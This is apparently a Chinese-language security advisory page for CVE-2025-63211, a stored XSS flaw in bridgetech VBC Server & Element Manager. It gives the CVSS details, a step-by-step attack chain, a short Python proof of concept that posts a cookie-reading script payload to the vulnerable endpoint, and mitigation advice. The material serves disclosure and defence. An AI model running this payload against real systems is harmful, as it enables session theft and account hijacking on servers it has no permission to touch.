CVE-2025-63211 CVSS 6.1 中危

CVE-2025-63211: bridgetech VBC Server & Element Manager 存储型XSS漏洞

披露日期: 2025-11-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-63211

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

bridgetech VBC Server & Element Manager

漏洞概述

bridgetech VBC Server & Element Manager是一款视频会议和流媒体服务器管理平台。该产品存在一处存储型跨站脚本(XSS)安全漏洞，漏洞位于用户设置文档功能模块。攻击者可以通过addName参数向/vbc/core/userSetupDoc/userSetupDoc端点注入恶意JavaScript脚本。由于该输入未经适当过滤和转义即被存储在服务器端，当其他用户访问相关页面时，恶意脚本将自动执行，从而窃取用户会话Cookie、劫持用户账户或进行其他恶意操作。此漏洞无需认证即可利用，但需要诱导目标用户访问触发点。CVSS评分6.1，属于中危级别。

技术细节

该漏洞为存储型XSS，攻击向量为网络路径。攻击者构造包含恶意JavaScript代码的addName参数值，发送至/vbc/core/userSetupDoc/userSetupDoc端点。由于服务端未对用户输入进行严格的HTML实体编码或输入验证，恶意脚本被永久存储在数据库或配置文件中。当管理员或其他用户访问用户管理界面或相关功能模块时，服务器将带有恶意载荷的数据返回给客户端浏览器，浏览器将其解析执行。攻击者可利用此漏洞获取受害者Cookie、模拟用户操作、窃取敏感数据或植入进一步攻击载荷。漏洞影响固件版本6.5.0-9至6.5.0-10。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为bridgetech VBC Server & Element Manager，确认版本在6.5.0-9至6.5.0-10范围内

STEP 2

步骤2: 构造恶意载荷

攻击者构造包含恶意JavaScript代码的XSS payload，如<script>alert(document.cookie)</script>

STEP 3

步骤3: 发送恶意请求

攻击者通过HTTP POST请求将恶意载荷作为addName参数发送至/vbc/core/userSetupDoc/userSetupDoc端点

STEP 4

步骤4: 载荷存储

服务器端未对输入进行过滤，将恶意脚本存储在数据库或配置文件中

STEP 5

步骤5: 诱导用户访问

攻击者诱导目标用户（管理员或其他用户）访问包含恶意载荷的页面

STEP 6

步骤6: 脚本执行

用户浏览器解析响应时执行恶意JavaScript，攻击者获取Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target:8080'

# Stored XSS payload for CVE-2025-63211
payload = '<script>alert(document.cookie)</script>'

# Exploit endpoint: /vbc/core/userSetupDoc/userSetupDoc
endpoint = f'{target}/vbc/core/userSetupDoc/userSetupDoc'

data = {
    'addName': payload,
    'action': 'add'  # or appropriate action parameter
}

print(f'[*] Sending payload to {endpoint}')
print(f'[*] Payload: {payload}')

try:
    response = requests.post(endpoint, data=data, timeout=10)
    print(f'[+] Response Status: {response.status_code}')
    print(f'[+] Payload sent successfully')
    print(f'[*] Payload stored - will execute when viewed by other users')
except requests.exceptions.RequestException as e:
    print(f'[-] Error: {e}')

影响范围

bridgetech VBC Server & Element Manager 固件版本 6.5.0-9

bridgetech VBC Server & Element Manager 固件版本 6.5.0-10

防御指南

临时缓解措施

在厂商发布修复补丁前，可采取以下临时缓解措施：1)限制对/vbc/core/userSetupDoc/userSetupDoc端点的访问权限；2)部署Web应用防火墙(WAF)规则过滤XSS特征字符如<script>标签；3)监控HTTP请求中的异常XSS载荷模式；4)提醒用户不要点击来源不明的链接以降低社工攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表